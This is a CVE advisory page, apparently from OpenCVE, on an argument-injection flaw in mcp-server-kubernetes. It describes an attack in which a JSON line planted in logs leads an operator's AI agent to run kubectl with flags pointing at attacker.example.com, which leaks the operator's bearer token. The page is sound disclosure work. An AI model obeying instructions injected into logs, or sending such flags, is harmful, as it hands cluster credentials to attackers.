Description
mcp-server-kubernetes is a Model Context Protocol server for Kubernetes cluster management. Prior to version 3.7.0, the kubectl_generic tool in mcp-server-kubernetes passes user-supplied flags directly to kubectl without any allowlist, enabling a privilege escalation attack within Kubernetes environments. An attacker who already has limited cluster or codebase access, for example, a developer with pod-deployment permissions but not cluster-admin credentials, can plant a single structured JSON line in an application's log output. When an operator with a privileged kubeconfig uses the MCP server to read those logs and their AI agent follows the injected instruction, kubectl_generic is called with --server=https://attacker.example.com and --insecure-skip-tls-verify=true. kubectl sends all API requests, including the Authorization: Bearer <token> header from the operator's kubeconfig to the attacker's endpoint. The captured token can then be replayed directly against the real Kubernetes API server, granting the attacker the full RBAC permissions of the operator's service account. This issue has been patched in version 3.7.0.
Published: 2026-06-11
Score: 6.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

mcp-server-kubernetes, a Model Context Protocol server for Kubernetes cluster management, was found to pass user-supplied flags directly to kubectl without an allowlist. Prior to version 3.7.0, this flaw allowed an attacker with limited cluster access, such as a developer with pod‑deployment permissions, to inject a single structured JSON line into application logs. When a privileged operator reads those logs with the MCP server, kubectl_generic executes the injected flags (e.g., --server=https://attacker.example.com and --insecure‑skip‑tls‑verify=true), sending all API requests—including the Bearer token from the operator's kubeconfig—to the attacker’s endpoint. The captured token can then be replayed against the real Kubernetes API, granting the attacker the full RBAC permissions of the operator’s service account. This flaw is an example of CWE-88. The issue is fixed in release 3.7.0.

Affected Systems

Flux159’s mcp-server-kubernetes version 3.6.x and earlier are affected. The issue was fixed in release 3.7.0. The vulnerability impacts Kubernetes cluster environments where the MCP server is used for cluster management and operators have the ability to read logs produced by applications.

Risk and Exploitability

The CVSS score of 6.1 indicates a moderate severity. The EPSS score is not available and the vulnerability is not listed in the CISA KEV catalog. Exploitation requires an attacker to already possess limited cluster or codebase access—such as a developer with pod‑deployment permissions—and the ability to inject a JSON line into application logs. The attacker must also rely on a privileged operator reading those logs, which is an additional prerequisite. Given the requirement for preexisting access and the lack of a publicly known exploit, the risk is moderate but still significant for environments with permissive log access or insufficient controls on who can read logs and empower the MCP server.

Generated by OpenCVE AI on June 11, 2026 at 22:43 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade mcp-server-kubernetes to version 3.7.0 or later to eliminate the flag injection vulnerability
  • Reconfigure mcp-server-kubernetes to enforce an allowlist on flags passed to kubectl_generic or disable the kubectl_generic feature entirely
  • Audit and restrict permissions so that only trusted operators can read application logs and invoke the MCP server, and monitor logs for unexpected JSON injection attempts

Generated by OpenCVE AI on June 11, 2026 at 22:43 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-6mx4-4h42-r8vh MCP Server Kubernetes: kubectl-generic flag injection enables Kubernetes bearer token exfiltration
History

Thu, 11 Jun 2026 21:00:00 +0000

Type Values Removed Values Added
First Time appeared Flux159
Flux159 mcp-server-kubernetes
Vendors & Products Flux159
Flux159 mcp-server-kubernetes

Thu, 11 Jun 2026 20:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Thu, 11 Jun 2026 19:00:00 +0000

Type Values Removed Values Added
Description mcp-server-kubernetes is a Model Context Protocol server for Kubernetes cluster management. Prior to version 3.7.0, the kubectl_generic tool in mcp-server-kubernetes passes user-supplied flags directly to kubectl without any allowlist, enabling a privilege escalation attack within Kubernetes environments. An attacker who already has limited cluster or codebase access, for example, a developer with pod-deployment permissions but not cluster-admin credentials, can plant a single structured JSON line in an application's log output. When an operator with a privileged kubeconfig uses the MCP server to read those logs and their AI agent follows the injected instruction, kubectl_generic is called with --server=https://attacker.example.com and --insecure-skip-tls-verify=true. kubectl sends all API requests, including the Authorization: Bearer <token> header from the operator's kubeconfig to the attacker's endpoint. The captured token can then be replayed directly against the real Kubernetes API server, granting the attacker the full RBAC permissions of the operator's service account. This issue has been patched in version 3.7.0.
Title mcp-server-kubernetes: kubectl-generic flag injection enables Kubernetes bearer token exfiltration
Weaknesses CWE-88
References
Metrics cvssV3_1

{'score': 6.1, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N'}


Subscriptions

Flux159 Mcp-server-kubernetes
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-06-11T19:35:27.250Z

Reserved: 2026-05-18T22:54:18.273Z

Link: CVE-2026-47250

cve-icon Vulnrichment

Updated: 2026-06-11T19:35:15.599Z

cve-icon NVD

Status : Deferred

Published: 2026-06-11T19:16:46.770

Modified: 2026-06-11T21:01:26.377

Link: CVE-2026-47250

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-11T22:45:05Z

Weaknesses
  • CWE-88

    Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')